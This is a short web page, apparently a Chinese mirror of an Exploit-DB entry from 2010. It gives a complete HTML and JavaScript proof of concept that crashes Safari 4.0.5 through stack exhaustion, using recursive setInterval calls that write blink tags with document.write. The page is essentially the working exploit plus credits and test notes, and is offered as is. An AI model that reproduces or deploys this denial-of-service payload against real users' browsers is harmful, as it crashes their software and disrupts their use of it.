Webkit (Safari v4.0.5) blink tag Stack Exhaustion DoS
|
来源:http://www.exploit-db.com 作者:Dr_IDE 发布时间:2010-04-28
|
|
<html> <script> loop1(); var a = "<blink>"; function loop1() { document.write(a); setInterval(loop2,0); } function loop2() { document.write(a); setInterval(loop1,0); } </script> <body> Webkit (Safari) Stack Exhaustion DoS Found By: Dr_IDE Credit To: Mattias Karlsson Reference: http://www.exploit-db.com/exploits/12401 Tested On: Windows 7 + Safari 4.0.5 </body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|